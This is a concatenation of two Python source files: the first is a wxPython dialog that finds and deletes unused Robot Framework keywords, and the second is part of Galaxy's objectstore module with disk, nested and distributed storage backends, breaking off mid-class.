self._unused_kw_list = ResultListCtrl(panel_unused_kw,
style=wx.LC_REPORT)
self._unused_kw_list.InsertColumn(0, "Keyword", width=400)
self._unused_kw_list.InsertColumn(1, "File", width=250)
self._unused_kw_list.SetMinSize((650, 250))
self._unused_kw_list.set_dialog(self)
self._delete_button = wx.Button(panel_unused_kw, wx.ID_ANY,
'Delete marked keywords')
sizer_unused_kw.Add(self._unused_kw_list, 1, wx.ALL | wx.EXPAND, 3)
unused_kw_controls = wx.BoxSizer(wx.HORIZONTAL)
unused_kw_controls.AddStretchSpacer(1)
unused_kw_controls.Add(self._delete_button, 0, wx.ALL | wx.ALIGN_RIGHT,
3)
sizer_unused_kw.Add(unused_kw_controls, 0, wx.ALL | wx.EXPAND, 3)
self._notebook.AddPage(panel_unused_kw, "Unused Keywords")
def _build_controls(self):
self._search_button = ButtonWithHandler(self, 'Search')
self._abort_button = ButtonWithHandler(self, 'Abort')
self._status_label = Label(self, label='')
controls = wx.BoxSizer(wx.HORIZONTAL)
controls.Add(self._search_button, 0, wx.ALL, 3)
controls.Add(self._abort_button, 0, wx.ALL, 3)
controls.Add(self._status_label, 1, wx.ALL | wx.EXPAND, 3)
self.Sizer.Add(controls, 0, wx.ALL | wx.EXPAND, 3)
def _build_notebook(self):
self._notebook = wx.Notebook(self, wx.ID_ANY, style=wx.NB_TOP)
self.Sizer.Add(self._notebook, 1, wx.ALL | wx.EXPAND, 3)
def _make_bindings(self):
self.Bind(wx.EVT_CLOSE, self._close_dialog)
self.Bind(wx.EVT_TEXT, self._update_filter, self._filter_input)
self.Bind(wx.EVT_RADIOBOX, self._update_filter_mode, self._filter_mode)
self.Bind(wx.EVT_CHECKBOX, self._update_filter_source_testcases, self._filter_source_testcases)
self.Bind(wx.EVT_CHECKBOX, self._update_filter_source_resources, self._filter_source_resources)
self.Bind(wx.EVT_BUTTON, self.OnDeletemarkedkeywords, self._delete_button)
self.Bind(wx.EVT_BUTTON, self.OnShowfilestobesearched, self._filter_test_button)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnResultSelected, self._unused_kw_list)
self.Bind(wx.EVT_CHECKBOX, self._upate_filter_regex, self._filter_regex_switch)
self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self._toggle_filter_active, self._filter_pane)
def _set_default_values(self):
check_testcases = True
self._filter_source_testcases.SetValue(check_testcases)
self._runner.set_filter_source_testcases(check_testcases)
check_resources = True
self._filter_source_resources.SetValue(check_resources)
self._runner.set_filter_source_resources(check_resources)
filter_mode = 0
self._filter_mode.SetSelection(filter_mode)
self._runner.set_filter_mode(filter_mode == 0)
use_regex = False
self._filter_regex_switch.SetValue(use_regex)
self._runner.set_filter_use_regex(use_regex)
filter_string = ''
self._filter_input.ChangeValue(filter_string)
self._runner.parse_filter_string(filter_string)
self._disable_filter()
self._abort_button.Disable()
self._delete_button.Disable()
def _update_filter(self, event):
self._runner.parse_filter_string(event.GetString())
def _update_filter_mode(self, event):
self._runner.set_filter_mode(event.GetInt() == 0)
def _update_filter_source_testcases(self, event):
self._runner.set_filter_source_testcases(event.Checked())
def _update_filter_source_resources(self, event):
self._runner.set_filter_source_resources(event.Checked())
def _upate_filter_regex(self, event):
self._runner.set_filter_use_regex(event.Checked())
def _toggle_filter_active(self, event):
if event.GetCollapsed():
self._disable_filter()
else:
self._enable_filter()
self._filter_pane.on_change(event)
def _disable_filter(self):
self._runner.set_filter_active(False)
self.label_filter_status.SetLabel('inactive')
self.label_filter_status.SetForegroundColour(wx.RED)
def _enable_filter(self):
self._runner.set_filter_active(True)
self.label_filter_status.SetLabel('active')
self.label_filter_status.SetForegroundColour((0,200,0))
def OnSearch(self, event):
self.begin_searching()
self._runner._run_review()
def OnAbort(self, event):
self.end_searching()
def OnDeletemarkedkeywords(self, event):
item = self._unused_kw_list.get_next_checked_item()
while item:
index = item[0]
kw = item[1]
listitem = item[2]
item_id = listitem.GetData()
self._unused_kw_list.DeleteItem(index)
self._unused_kw_list.RemoveClientData(item_id)
kw.delete()
self._update_notebook_text("Unused Keywords (%d)" % self._unused_kw_list.GetItemCount())
self.update_status("")
item = self._unused_kw_list.get_next_checked_item()
self.item_in_kw_list_checked()
def OnShowfilestobesearched(self, event):
df_list = self._runner._get_datafile_list()
if not df_list:
string_list = "(None)"
else:
string_list = "\n".join(df.name for df in df_list)
message = "Keywords of the following files will be included in the search:\n\n" + string_list
wx.MessageDialog(self, message=message, caption="Included files", style=wx.OK|wx.ICON_INFORMATION).ShowModal()
def OnResultSelected(self, event):
self.frame.tree.select_node_by_data(self._unused_kw_list.GetClientData(event.GetData()))
def item_in_kw_list_checked(self):
if self._unused_kw_list.get_number_of_checked_items() > 0:
self._delete_button.Enable()
else:
self._delete_button.Disable()
def show_dialog(self):
if not self.IsShown():
self._clear_search_results()
self.Show()
self.Raise()
def _close_dialog(self, event):
if self._search_model.searching:
self.end_searching()
if event.CanVeto():
self.Hide()
else:
self.Destroy()
def begin_searching(self):
self._abort_button.Enable()
self._search_button.Disable()
self._filter_pane.Disable()
self._unused_kw_list.Disable()
self._clear_search_results()
self._dots = DottedSearch(self, self._update_unused_keywords)
self._dots.start()
def _clear_search_results(self):
self._unused_kw_list.ClearAll()
self._update_notebook_text('Unused Keywords')
self._delete_button.Disable()
self._status_label.SetLabel('')
self._search_model.clear_search()
def add_result_unused_keyword(self, index, keyword):
keyword_info = keyword.info
if wx.VERSION >= (3, 0, 3, ''): # DEBUG wxPhoenix
self._unused_kw_list.InsertItem(index, keyword_info.name)
else:
self._unused_kw_list.InsertStringItem(index, keyword_info.name)
filename = os.path.basename(keyword_info.item.source)
if wx.VERSION >= (3, 0, 3, ''): # DEBUG wxPhoenix
self._unused_kw_list.SetItem(index, 1, filename)
else:
self._unused_kw_list.SetStringItem(index, 1, filename)
self._unused_kw_list.SetItemData(index, index)
self._unused_kw_list.SetClientData(index, keyword)
def _update_unused_keywords(self, dots):
count_before = self._unused_kw_list.GetItemCount()
for index, kw in list(enumerate(self._search_model.keywords))[count_before:]:
self.add_result_unused_keyword(index, kw)
self.update_status("Searching.%s \t- %s" % (dots, self._search_model.status))
if not self._search_model.searching:
self.end_searching()
def _update_notebook_text(self, new_text):
self._notebook.SetPageText(0, new_text)
def update_status(self, message, increase=1):
self._status_label.SetLabel(message)
def end_searching(self):
self._dots.stop()
self._search_model.end_search()
self._update_notebook_text('Unused Keywords (%d)' % (self._unused_kw_list.GetItemCount()))
self.update_status("Search finished - Found %d Unused Keywords" % (self._unused_kw_list.GetItemCount()))
self._unused_kw_list.Enable()
self._abort_button.Disable()
self._filter_pane.Enable()
self._search_button.Enable()
def send_radiobox_event(self, mycontrol):
cmd = wx.CommandEvent(wx.EVT_RADIOBOX.evtType[0])
cmd.SetEventObject(mycontrol)
cmd.SetId(mycontrol.GetId())
mycontrol.GetEventHandler().ProcessEvent(cmd)
class ReviewRunner(object):
def __init__(self, controller, model):
self._controller = controller
self._model = model
self._filter = ResultFilter()
def set_filter_active(self, value):
self._filter.active = value
def set_filter_mode(self, exclude):
self._filter.excludes = exclude
def set_filter_source_testcases(self, value):
self._filter.check_testcases = value
def set_filter_source_resources(self, value):
self._filter.check_resources = value
def set_filter_use_regex(self, value):
self._filter.use_regex = value
def parse_filter_string(self, filter_string):
self._filter.set_strings(filter_string.split(','))
def _get_datafile_list(self):
return [df for df in self._controller.datafiles if self._filter.include_file(df)]
def _run_review(self):
self._model.begin_search()
Thread(target=self._run).start()
def _run(self):
self._stop_requested = False
self._model.status = 'listing datafiles'
for df in self._get_datafile_list():
libname = os.path.basename(df.source).rsplit('.', 1)[0]
self._model.status = 'searching from '+libname
for keyword in df.keywords:
time.sleep(0) # GIVE SPACE TO OTHER THREADS -- Thread.yield in Java
self._model.status = "%s.%s" % (libname, keyword.name)
if not self._model.searching:
break
# Check if it is unused
if not isinstance(keyword, LibraryKeywordInfo) and keyword.name:
if self._is_unused(keyword):
self._model.add_unused_keyword(keyword)
if not self._model.searching:
break
self._model.end_search()
def _is_unused(self, keyword):
try:
self._controller.execute(FindUsages(keyword.name, keyword_info=keyword.info)).next()
return False
except StopIteration:
return True
class ResultFilter(object):
def __init__(self):
self._strings = []
self.excludes = True
self.check_testcases = True
self.check_resources = True
self.use_regex = False
self.active = False
def set_strings(self, strings):
self._strings = [s.strip() for s in strings if s.strip()]
def include_file(self, datafile):
if isinstance(datafile, TestDataDirectoryController):
return False
if not self.active:
return True
if not self.check_testcases and isinstance(datafile, TestCaseFileController):
return False
if not self.check_resources and isinstance(datafile, ResourceFileController):
return False
if not self._strings:
return True
return self.excludes ^ any(self._results(datafile.name))
def _results(self, name):
for string in self._strings:
if self.use_regex:
yield bool(re.match(string, name))
else:
yield string in name
class ResultModel(object):
def __init__(self):
self.clear_search()
def clear_search(self):
self.status = ''
self.keywords = []
self.searching = False
def add_unused_keyword(self, keyword):
self.keywords += [keyword]
def begin_search(self):
self.searching = True
def end_search(self):
self.searching = False
class ResultListCtrl(wx.ListCtrl, listmix.CheckListCtrlMixin, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, style):
self.parent = parent
wx.ListCtrl.__init__(self, parent=parent, style=style)
listmix.CheckListCtrlMixin.__init__(self)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.setResizeColumn(2)
self._clientData = {}
def set_dialog(self, dialog):
self._dlg = dialog
def OnCheckItem(self, index, flag):
if self._dlg:
self._dlg.item_in_kw_list_checked()
else:
print("No dialog set")
def get_next_checked_item(self):
for i in range(self.GetItemCount()):
if self.IsChecked(i):
item = self.GetItem(i)
return ([i, self.GetClientData(item.GetData()), item])
return None
def get_number_of_checked_items(self):
sum = 0
for i in range(self.GetItemCount()):
if self.IsChecked(i):
sum += 1
return sum
def SetClientData(self, index, data):
self._clientData[index] = data
def GetClientData(self, index):
return self._clientData.get(index, None)
def RemoveClientData(self, index):
del self._clientData[index]
def ClearAll(self):
self.DeleteAllItems()
self._clientData.clear()
def print_data(self):
print(self._clientData)
class MyCollapsiblePane(wx.CollapsiblePane):
def __init__(self, parent, *args, **kwargs):
wx.CollapsiblePane.__init__(self, parent, *args, **kwargs)
self.Bind(wx.EVT_SIZE, self._recalc_size)
def _recalc_size(self, event=None):
if self.IsExpanded():
expand_button_height = 32 # good guess...
height = 150 if IS_MAC else 135
self.SetSizeHints(650, height + expand_button_height)
if self.IsCollapsed():
self.SetSizeHints(650, 40)
if event:
event.Skip()
def on_change(self, event):
self.GetParent().Layout()
|
__init__.py
|
"""
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import logging
import os
import random
import shutil
import threading
import time
from xml.etree import ElementTree
import yaml
try:
from sqlalchemy.orm import object_session
except ImportError:
object_session = None
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
umask_fix_perms,
)
from galaxy.util.odict import odict
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(object):
"""ObjectStore abstract interface.
FIELD DESCRIPTIONS (these apply to all the methods in this class):
:type obj: StorableObject
:param obj: A Galaxy object with an assigned database ID accessible via
the .id attribute.
:type base_dir: string
:param base_dir: A key in `self.extra_dirs` corresponding to the base
directory in which this object should be created, or `None` to specify
the default directory.
:type dir_only: boolean
:param dir_only: If `True`, check only the path where the file identified
by `obj` should be located, not the dataset itself. This option applies
to `extra_dir` argument as well.
:type extra_dir: string
:param extra_dir: Append `extra_dir` to the directory structure where the
dataset identified by `obj` should be located. (e.g.,
000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
config.jobs_directory =
'$GALAXY_ROOT/database/jobs_directory');
'temp' (defaulting to config.new_file_path =
'$GALAXY_ROOT/database/tmp').
:type extra_dir_at_root: boolean
:param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
the `extra_dir` argument is placed at root of the created directory
structure rather than at the end (e.g., extra_dir/000/obj.id vs.
000/extra_dir/obj.id)
:type alt_name: string
:param alt_name: Use this name as the alternative name for the created
dataset rather than the default.
:type obj_dir: boolean
:param obj_dir: Append a subdirectory named with the object's ID (e.g.
000/obj.id)
"""
def __init__(self, config, config_dict={}, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
assert self.store_by in ["id", "uuid"]
extra_dirs = {}
extra_dirs['job_work'] = config.jobs_directory
extra_dirs['temp'] = config.new_file_path
extra_dirs.update(dict(
(e['type'], e['path']) for e in config_dict.get('extra_dirs', [])))
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
"""Return True if the object identified by `obj` exists, False otherwise."""
raise NotImplementedError()
def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Mark the object (`obj`) as existing in the store, but with no content.
This method will create a proper directory structure for
the file if the directory does not already exist.
"""
raise NotImplementedError()
def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Test if the object identified by `obj` has content.
If the object does not exist raises `ObjectNotFound`.
"""
raise NotImplementedError()
def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return size of the object identified by `obj`.
If the object does not exist, return 0.
"""
raise NotImplementedError()
def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Delete the object identified by `obj`.
:type entire_dir: boolean
:param entire_dir: If True, delete the entire directory pointed to by
extra_dir. For safety reasons, this option applies
only for and in conjunction with the extra_dir or
obj_dir options.
"""
raise NotImplementedError()
def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Fetch `count` bytes of data offset by `start` bytes using `obj.id`.
If the object does not exist raises `ObjectNotFound`.
:type start: int
:param start: Set the position to start reading the dataset file
:type count: int
:param count: Read at most `count` bytes from the dataset
"""
raise NotImplementedError()
def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Get the expected filename with absolute path for object with id `obj.id`.
This can be used to access the contents of the object.
"""
raise NotImplementedError()
def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
"""
Inform the store that the file associated with `obj.id` has been updated.
If `file_name` is provided, update from that file instead of the
default.
If the object does not exist raises `ObjectNotFound`.
:type file_name: string
:param file_name: Use file pointed to by `file_name` as the source for
updating the dataset identified by `obj`
:type create: boolean
:param create: If True and the default dataset does not exist, create
it first.
"""
raise NotImplementedError()
def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the URL for direct acces if supported, otherwise return None.
Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
'config': config_to_dict(self.config),
'extra_dirs': extra_dirs,
'store_by': self.store_by,
'type': self.store_type,
}
def _get_object_id(self, obj):
return getattr(obj, self.store_by)
class DiskObjectStore(ObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = 'disk'
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super(DiskObjectStore, self).__init__(config, config_dict)
self.file_path = config_dict.get("files_dir") or config.file_path
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
for e in config_xml:
if e.tag == 'files_dir':
config_dict["files_dir"] = e.get('path')
else:
extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super(DiskObjectStore, self).to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def _get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
obj_dir=False, old_style=True)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
obj_id = self._get_object_id(obj)
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
return os.path.abspath(path)
def exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self.exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get('dir_only', False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, 'w').close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self.exists(obj, **kwargs):
try:
filepath = self.get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self.get_filename(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
obj_dir = kwargs.get('obj_dir', False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self.exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical('%s delete error %s' % (self._get_filename(obj, **kwargs), ex))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self.get_filename(obj, **kwargs), 'r') # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
return self._construct_path(obj, **kwargs)
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop('preserve_symlinks', False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self.create(obj, **kwargs)
if file_name and self.exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self.get_filename(obj, **kwargs))
else:
path = self.get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except IOError as ex:
log.critical('Error copying %s to %s: %s' % (file_name, self._get_filename(obj, **kwargs), ex))
raise ex
def get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def get_store_usage_percent(self):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(ObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super(NestedObjectStore, self).__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super(NestedObjectStore, self).shutdown()
def exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method('exists', obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method('file_ready', obj, False, False, **kwargs)
def create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method('empty', obj, True, False, **kwargs)
def size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method('size', obj, 0, False, **kwargs)
def delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method('delete', obj, False, False, **kwargs)
def get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method('get_data', obj, ObjectNotFound, True, **kwargs)
def get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method('get_filename', obj, ObjectNotFound, True, **kwargs)
def update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get('create', False):
self.create(obj, **kwargs)
kwargs['create'] = False
return self._call_method('update_from_file', obj, ObjectNotFound, True, **kwargs)
def get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method('get_object_url', obj, None, False, **kwargs)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return '{}({}={})'.format(obj.__class__.__name__, self.store_by, obj_id)
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception,
**kwargs):
"""Check all children object stores for the first one with the dataset."""
for key, store in self.backends.items():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = 'distributed'
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super(DistributedObjectStore, self).__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
random.seed()
backends_def = config_dict["backends"]
for backend_def in backends_def:
backened_id = backend_def["id"]
file_path = backend_def["files_dir"]
extra_dirs = backend_def.get("extra_dirs", [])
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
disk_config_dict = dict(files_dir=file_path, extra_dirs=extra_dirs)
self.backends[backened_id] = DiskObjectStore(config, disk_config_dict)
self.max_percent_full[backened_id] = maxpctfull
log.debug("Loaded disk backend '%s' with weight %s and file_path: %s" % (backened_id, weight, file_path))
for i in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backened_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
self.filesystem_monitor_thread.setDaemon(True)
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find('backends')
backends = []
config_dict = {
'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
'backends': backends,
}
for elem in [e for e in backends_root if e.tag == 'backend']:
id = elem.get('id')
weight = int(elem.get('weight', 1))
maxpctfull = float(elem.get('maxpctfull', 0))
elem_type = elem.get('type', 'disk')
if elem_type:
path = None
extra_dirs = []
for sub in elem:
if sub.tag == 'files_dir':
path = sub.get('path')
elif sub.tag == 'extra_dir':
type = sub.get('type')
extra_dirs.append({"type": type, "path": sub.get('path')})
backend_dict = {
'id': id,
'weight': weight,
'max_percent_full': maxpctfull,
'files_dir': path,
'extra_dirs': extra_dirs,
'type': elem_type,
}
backends.append(backend_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, \
"distributed object store ('object_store = distributed') " \
"requires a config file, please set one in " \
"'distributed_object_store_config_file')"
log.debug('Loading backends for distributed object store from %s', distributed_config)
config_xml = ElementTree.parse(distributed_config).getroot()
legacy = True
else:
log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self):
as_dict = super(DistributedObjectStore, self).to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
